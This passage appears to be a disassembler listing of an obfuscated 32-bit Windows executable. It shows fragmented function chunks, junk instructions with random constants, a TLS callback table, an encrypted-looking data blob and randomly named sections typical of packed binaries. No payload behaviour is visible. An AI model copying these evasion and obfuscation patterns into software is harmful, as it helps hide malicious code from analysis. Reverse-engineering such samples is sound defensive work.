; START OF FUNCTION CHUNK FOR sub_42284F
loc_42C531: ; CODE XREF: sub_42284F:loc_42C03A�j
jz loc_423028
jmp loc_426480
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_42C53C: ; CODE XREF: sub_42C24F-AD82�j
jz loc_421EEB
jmp loc_423F3E
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
loc_42C547: ; DATA XREF: sub_42BB8A:loc_42BBA1�o
add dword ptr [ebp-8], 2
jmp loc_4275CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42C550: ; CODE XREF: sub_421D33+4903�j
; sub_421D33+97E8�j
test byte ptr [ebp-8], 20h
jz loc_42B8F2
push ebp
call sub_42BDF4
loc_42C560: ; CODE XREF: _94j21ax3:00429E36�j
jb loc_421874
loc_42C566: ; CODE XREF: _94j21ax3:loc_429E1E�j
and eax, 6AD997CCh
add eax, 0B7B0EF3Fh
xchg eax, [esp+28h+var_28]
jmp loc_4239C4
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
xchg ebp, ecx
adc edx, 7C5A8FF9h
jmp sub_42B1BB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42C588: ; CODE XREF: sub_42C0BC-4D23�j
jmp loc_4212F5
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3E4
loc_42C58D: ; CODE XREF: sub_42B3E4-4D7�j
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_42AED9
; ---------------------------------------------------------------------------
loc_42C59B: ; CODE XREF: sub_42B3E4-4E6�j
cmp dword ptr [ebp-10h], 2
jnz loc_42AED9
jmp loc_425965
; END OF FUNCTION CHUNK FOR sub_42B3E4
; ---------------------------------------------------------------------------
sbb ecx, 0FE728E7h
jmp loc_426B63
; ---------------------------------------------------------------------------
adc edx, 0A281D5F4h
jmp sub_426626
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266F6
loc_42C5C1: ; CODE XREF: sub_4266F6+1C4F�j
jmp loc_4232C5
; END OF FUNCTION CHUNK FOR sub_4266F6
; ---------------------------------------------------------------------------
xchg ecx, ebx
jmp sub_421C84
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C5CD proc near ; CODE XREF: sub_42541E:loc_42BED7�j
; FUNCTION CHUNK AT 004270E5 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
push offset loc_423BD9
jmp loc_4270E5
sub_42C5CD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42C5DD: ; CODE XREF: sub_42A0CC:loc_4246A4�j
jnz loc_42346B
jmp loc_4293E0
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
sub_42C5E8 proc near ; CODE XREF: _94j21ax3:0042A046�j
; sub_423324:loc_42BAA2�p
; FUNCTION CHUNK AT 00421180 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423CFD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BFB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C08D SIZE 00000016 BYTES
mov [esp+0], esi
pop esi
add eax, ebp
add eax, 34E827B9h
mov eax, [eax]
jmp loc_421180
sub_42C5E8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C5FB: ; CODE XREF: _94j21ax3:0042C388�j
jnp loc_422942
rol eax, 18h
and ecx, ebx
; START OF FUNCTION CHUNK FOR sub_423081
loc_42C606: ; CODE XREF: sub_423081:loc_422A0A�j
rol eax, 3
xor eax, 0D467520Ah
add eax, ebp
push edx
jmp loc_429574
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
TlsDirectory db 0
db 3 dup(0)
TlsEnd_ptr db 0
db 3 dup(0)
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex db 0 ; DATA XREF: _94j21ax3:TlsIndex_ptr�o
db 3 dup(0)
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: _94j21ax3:TlsCallbacks_ptr�o
dd 0
db 0ACh
dd 7C4BB6F0h, 971A7573h, 53848C4Ah, 85464E04h, 0ADE228E1h
dd 2FEE96A6h, 1714F418h, 0C4FF7404h, 0AA78EEA6h, 9C1FFC4h
dd 9209DE39h, 6D8FD33Bh, 11B403D4h, 0E1701BBEh, 57C098A0h
dd 0C72AECEFh, 1D5FB148h, 2313C016h, 465EE6B8h, 0F8D9ED8Dh
dd 8A33Dh, 0B4A1B30Ah, 0DC91A639h, 0D7A46D4h, 6D977900h
dd 9EC9A915h, 1A24C12Eh, 15ACACA6h, 41710852h, 0DAB455AEh
dd 0F507B037h, 47AD0C11h, 70B89F2Ah, 8A3DC0B8h, 75CEB7B5h
dd 4808DDFAh, 0D33578E8h, 0E387D8DDh, 0F0CFA5A7h, 82E2BF1Dh
dd 35DE108Fh, 0B50637B0h, 5112A27Ah, 0A3F10F90h, 0C15AA97Eh
dd 0C351EA24h, 927CE50h, 22FF7254h, 0C7C7B86Ah, 54F056B1h
dd 0D8E88E93h, 3E4D2CD1h, 7821ED58h, 6195EEEBh, 6763D8E7h
dd 158F63CBh, 45F342F1h, 0BDB1D7CCh, 0EABEA2F1h, 927C8D8Dh
dd 5C59CEFAh, 0B50F1487h, 3E19F6F3h, 4E7369EDh, 23D5E2F6h
dd 16E3A522h, 0AB1DE34Ch, 0F8FFDEECh, 372492Ch, 0F2452E88h
dd 67CCE736h, 0C3F62655h, 35849A32h, 0F205EDE2h, 5D2B9CCDh
dd 60CCC1A1h, 0BA45F704h, 0E5B8BD91h, 0E662E30Fh, 0BEE3C4CEh
dd 53780C05h, 1E45FC8Ah, 0A03B9EA6h, 0FDCE244h, 673E0FF1h
dd 0DB2B4F4h, 16EC38ADh, 90555886h, 30028472h, 2EBCB004h
dd 4D6915FDh, 0AAA1B0FDh, 84851D47h, 816A7D8Fh, 5EF8FDA5h
dd 5A872155h, 0C49CC89Ch, 1F7EA5DDh, 61BC3C2Ah, 0B6C8A656h
dd 0C02DA83h, 0A99DC837h, 3608E4ECh, 0CC0A60B4h, 91796391h
dd 4C49052Bh, 0FEF7B3A0h, 0B4099179h, 8A10A443h, 5C9CE787h
dd 60C2893Eh, 0C6F4BA7Ah, 0B032DED6h, 200h dup(0)
_94j21ax3 ends
; Section 6. (virtual address 0002D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0002D000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
d7bjfs2n segment para public 'DATA' use32
assume cs:d7bjfs2n
;org 42D000h
dd 21000h, 68h, 30BE30A5h, 311D30CEh, 32183207h, 327F3267h
dd 32A6329Bh, 33113304h, 33803358h, 340933D2h, 351D346Ah
dd 35BE354Ah, 36B3365Bh, 36EC36BEh, 3761370Bh, 37CF376Dh
dd 38793850h, 39533902h, 3AAB395Dh, 3B2A3B15h, 3BE33B6Dh
dd 3D0A3C16h, 3E3A3DA6h, 3F1D3EB4h, 3F593F47h, 3FE6h, 22000h
dd 6Ch, 3043300Ah, 30BD309Ah, 31643106h, 31FF317Ch, 3389331Dh
dd 342D33A4h, 350E34E1h, 35B93540h, 3687367Bh, 36DD36BDh
dd 37E8372Bh, 393838F1h, 3A4D397Ch, 3AC83A72h, 3B1D3AD7h
dd 3BAC3B75h, 3BC33BBBh, 3C113BE5h, 3C2E3C1Bh, 3CCA3C54h
dd 3D303D08h, 3D4F3D3Ah, 3DB83D88h, 3F473EF4h, 3F97h, 23000h
dd 74h, 30B03060h, 313F310Bh, 31D8319Dh, 3253321Eh, 329C326Fh
dd 3403339Fh, 34943472h, 350E34FCh, 359A357Ch, 35E135C9h
dd 365335FEh, 36A43666h, 36E436BAh, 370E3703h, 379C374Bh
dd 393D3805h, 39E83951h, 3ABE3A35h, 3AF43AE9h, 3B393B0Eh
dd 3BDC3BC3h, 3CA23C88h, 3D9E3D16h, 3E253DADh, 3E853E6Bh
dd 3FBA3EA9h, 3FF9h, 24000h, 5Ch, 30D03038h, 319C30FCh
dd 331631CCh, 33893384h, 33A8339Ah, 346C342Ah, 34CA347Fh
dd 350634D7h, 3555352Bh, 35B43568h, 36563640h, 36FF367Bh
dd 376C3718h, 391E38D2h, 3A653A0Fh, 3BB43B86h, 3C073BC4h
dd 3D833C15h, 3DDF3DB6h, 3F7A3F46h, 3FFD3FBFh, 25000h
dd 48h, 30D6304Eh, 311030FDh, 3249319Ah, 32D432CFh, 338C32EDh
dd 355D33EBh, 35AA3589h, 363935C5h, 3763375Ah, 37A2377Bh
dd 383337FCh, 391038F2h, 3A653966h, 3AC63A79h, 3AF13ADEh
dd 3BA33B5Ch, 26000h, 6Ch, 34143404h, 34563421h, 34C934B6h
dd 34F834D3h, 35533521h, 360835F9h, 365D3644h, 36A63677h
dd 37EA373Ah, 3866381Eh, 392838A2h, 3A06394Ch, 3AC83A3Ah
dd 3B3D3B10h, 3B8E3B7Ch, 3C343BA4h, 3C6F3C6Ah, 3CAA3C86h
dd 3D173CEBh, 3D863D58h, 3DE93DD7h, 3E413E04h, 3EEE3EAAh
dd 3F8D3F00h, 3FEDh, 27000h, 94h, 30183009h, 308D307Bh
dd 30D030A2h, 313530DCh, 3186315Ch, 31C431ACh, 32573221h
dd 32933286h, 330F32A0h, 332D331Dh, 333B3334h, 34AD3356h
dd 35233516h, 356C3543h, 35FD35ADh, 36823641h, 36D036C1h
dd 376A36EFh, 3792377Eh, 37F037CCh, 381B37FEh, 387A385Eh
dd 38A4388Bh, 3A1F39F6h, 3A943A36h, 3B5C3AC4h, 3BF73BD8h
dd 3C483C0Ah, 3D193CB8h, 3D5C3D43h, 3E2E3D84h, 3F133F0Eh
dd 3F693F28h, 3FE83FB8h, 3FFFh, 28000h, 84h, 30E130AFh
dd 31863131h, 32C231D5h, 3332331Ch, 340A3387h, 3469340Fh
dd 34A734A0h, 34C834B7h, 356E34D6h, 3594357Fh, 35DD35B1h
dd 36B33686h, 36F136BDh, 37363724h, 375E374Dh, 37CF37C5h
dd 382537F2h, 38583849h, 38CF38A1h, 390738E5h, 3998391Bh
dd 3A2939EBh, 3B073AAAh, 3B603B0Fh, 3CB33BE7h, 3CF03CCDh
dd 3DBA3D17h, 3DE13DD3h, 3E1D3E0Eh, 3E3F3E35h, 3F92h, 29000h
dd 7Ch, 3060303Bh, 30D630C8h, 313F3131h, 318E3145h, 31B3319Bh
dd 33A2338Bh, 33B433AEh, 34A73438h, 34EC34DAh, 355C34F1h
dd 35B1359Eh, 362035D3h, 374B36F9h, 379F379Ah, 37B037ABh
dd 389F3833h, 38CC38B6h, 391938FEh, 399A397Fh, 3A2139D0h
dd 3ADE3ACDh, 3B513B3Eh, 3CFA3BB8h, 3DA03D0Ah, 3E8B3DF0h
dd 3F1E3ED2h, 3FCC3F48h, 3FEB3FD7h, 3FFDh, 2A000h, 70h
dd 30B03089h, 32093119h, 33603240h, 343733F5h, 34A8344Ah
dd 34E934D3h, 360A35C4h, 364A3627h, 37883688h, 380337E1h
dd 3845380Fh, 388C387Ch, 38F038DBh, 39B93927h, 3A6F3A45h
dd 3AE23AC7h, 3B3B3B07h, 3CC63B8Ch, 3CEE3CCBh, 3D103D05h
dd 3D973D7Dh, 3E2E3DDEh, 3E7D3E51h, 3EBF3E99h, 3FA03F47h
dd 3FF53FB3h, 2B000h, 80h, 305A3021h, 30E83094h, 313F310Ch
dd 315E314Fh, 319C3186h, 31DB31C4h, 323D3218h, 32EF32CDh
dd 3397338Dh, 33AC33A1h, 353233FCh, 360A359Dh, 36533620h
dd 36A8369Dh, 378A36B1h, 384D37C7h, 38923864h, 3910389Ah
dd 39973961h, 3A673A27h, 3B2A3B05h, 3BBF3BA2h, 3C2D3BF0h
dd 3CCB3C47h, 3D373CD7h, 3DE53D59h, 3E6B3E4Dh, 3EA33E8Ah
dd 3F003ECDh, 3FFC3F5Ah, 2C000h, 24h, 305F3046h, 32AE30D6h
dd 331B330Eh, 33B4335Bh, 35D4356Eh, 3623361Fh, 3633h, 2C0h dup(0)
d7bjfs2n ends
; Section 7. (virtual address 0002E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0002E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 42E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start